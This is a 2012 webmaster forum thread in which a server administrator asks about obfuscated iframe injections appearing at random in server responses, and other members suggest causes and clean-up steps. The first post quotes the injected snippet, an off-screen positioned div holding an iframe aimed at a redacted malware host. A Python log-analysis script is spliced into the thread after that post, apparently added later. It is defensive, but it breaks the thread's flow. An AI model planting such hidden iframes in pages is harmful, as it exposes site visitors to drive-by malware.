
iFrame Injections on Server

     
12:05 pm on Aug 15, 2012 (gmt 0)

Full Member

10+ Year Member

joined:May 3, 2004
posts:302
votes: 0


We had a server that showed this type of obfuscated iFrame injection:
<style>.ncy8eh4 { position:absolute; left:-1228px; top:-1108px} </style> <div class="ndicy73jk"><iframe src="http://malware host/325364773.html


The injected code would change constantly with different URLs.

The iFrame wouldn't always show up, but it affected every site on the server and could affect any page - even a test text page like test.html.

Logs show no signs of unauthorized entry, passwords are secure, Apache is 2.2.21.

Since this got into the whole server, we're suspecting something with Apache, but can't figure out how it could be compromised in this manner.

It looks like others have had a similar problem. A breakdown is in detail here:
[blog.unmaskparasites.com]

Some of the key points from the article:
We should be actually talking about infected server responses since the malicious code cannot be found in any website files.

It is pretty hard to detect this infection since only random server responses are affected.

If you check Apache logs, you can recognize tampered responses since their sizes are slightly bigger than typical response sizes for the same pages.


Any idea how this could happen or how to get rid of it?
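The log-size check quoted above, worked through as an added example (this is not code from the original post, from unmaskparasites, or from Apache). It assumes the server writes the standard Apache common or combined log format, where the last numeric field is %b, the number of body bytes sent, so an injected snippet shows up directly as a larger value for the same URL. The sample log lines are constructed; the two oversize entries stand in for requests that received the iframe.

```python
import re
from collections import Counter, defaultdict

# Apache common/combined log line. The size field is %b, the body bytes sent
# (headers excluded), so an injected snippet inflates it for that one request.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample log lines (not from the original poster's server).
# /test.html is a static page, so every clean response is exactly 512 bytes.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Aug/2012:12:01:03 +0000] "GET /test.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.6 - - [15/Aug/2012:12:01:09 +0000] "GET /test.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Aug/2012:12:02:41 +0000] "GET /test.html HTTP/1.1" 200 661 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Aug/2012:12:03:12 +0000] "GET /test.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Aug/2012:12:04:00 +0000] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Aug/2012:12:04:05 +0000] "GET /index.php HTTP/1.1" 200 8340 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [15/Aug/2012:12:05:30 +0000] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [15/Aug/2012:12:05:31 +0000] "GET /logo.png HTTP/1.1" 200 4021 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [15/Aug/2012:12:05:32 +0000] "GET /missing.html HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return a dict for one access-log line, or None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry = m.groupdict()
    entry["status"] = int(entry["status"])
    entry["size"] = 0 if entry["size"] == "-" else int(entry["size"])
    return entry


def find_inflated_responses(lines, min_delta=20, max_delta=4096, min_samples=3):
    """Flag 200 responses whose size is slightly above the usual size for that path.

    The baseline for each path is its most common logged size. This works best
    on static pages such as test.html, whose size never changes legitimately;
    dynamic pages vary on their own, so tune the deltas or watch a canary page.
    Returns (timestamp, client_ip, path, baseline_size, actual_size) tuples.
    """
    by_path = defaultdict(list)
    for entry in map(parse_line, lines):
        if entry and entry["status"] == 200 and entry["method"] == "GET":
            by_path[entry["path"]].append(entry)

    flagged = []
    for path, entries in by_path.items():
        if len(entries) < min_samples:
            continue  # too few requests to establish a baseline
        baseline, _count = Counter(e["size"] for e in entries).most_common(1)[0]
        for e in entries:
            delta = e["size"] - baseline
            if min_delta <= delta <= max_delta:
                flagged.append((e["ts"], e["ip"], path, baseline, e["size"]))
    return flagged


if __name__ == "__main__":
    for ts, ip, path, base, size in find_inflated_responses(SAMPLE_LOG):
        print(f"{ts} {ip} {path}: {size} bytes, baseline {base} (+{size - base})")
```

Against a real server, pass the open log file (`find_inflated_responses(open("/var/log/apache2/access.log"))`) and read the flagged timestamps alongside the snippet size you observed; the oversize responses also tell you which client IPs were served the iframe, which is the list you need for the next step of the investigation.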
2:07 pm on Aug 15, 2012 (gmt 0)

Senior Member: wilderness

joined:Nov 11, 2001
posts:5496
votes: 3


Thread title

iFrame Injections on Server


Any idea how this could happen or how to get rid of it?


SQL injections, PHP vulnerabilities and/or use of 3rd party PHP add-ons, Perl scripts and/or use of 3rd party Perl scripts (same vulnerabilities).

I don't recall seeing any references within this forum which stated that Apache offered a capability to write either html or CSS.
4:42 pm on Aug 15, 2012 (gmt 0)

Full Member

10+ Year Member

joined:May 3, 2004
posts:302
votes: 0


Thanks for the response. I realize this might not be an Apache issue, but since it seems to be happening at the root level and is affecting other Apache sites, I thought this was the appropriate forum.
4:46 pm on Aug 15, 2012 (gmt 0)

Senior Member: wilderness

joined:Nov 11, 2001
posts:5496
votes: 3


SQL injections [google.com]
1:44 am on Aug 16, 2012 (gmt 0)

System Operator from US: incredibill

joined:Jan 25, 2005
posts:14664
votes: 99


If you think the entire server is infected, which I've seen with this type of hack, I'd suggest migrating to a clean server and upgrade/update ALL your installed CGI/PHP/etc. software to make sure it's all current and change ALL your passwords.

FWIW, if you're using a control panel like Plesk they've had a couple of vulnerabilities lately and the micro-updates appeared to patch mine, but some needed to apply it manually so that could be another source of infiltration.
6:18 pm on Aug 16, 2012 (gmt 0)

Full Member

10+ Year Member

joined:May 3, 2004
posts:302
votes: 0


Thanks Bill.

This is a really tricky piece of malware. It gets injected into any page with a </script> tag, and it comes and goes, making it very hard to trace.

The destination URL (iframe src=) changes simultaneously on several infected sites, which we learned at unmaskparasites.

There are no signs of hacked files or rogue scripts, and the CMS is all custom.

At this point, our best guess is a compromised Apache module or PHP binary.
6:29 pm on Aug 16, 2012 (gmt 0)

System Operator from US: incredibill

joined:Jan 25, 2005
posts:14664
votes: 99


the CMS is all custom


Which means if the inputs aren't sanitized and you're using SQL then it's possibly wide open for SQL injection and anything is possible from there, but that's just speculation obviously.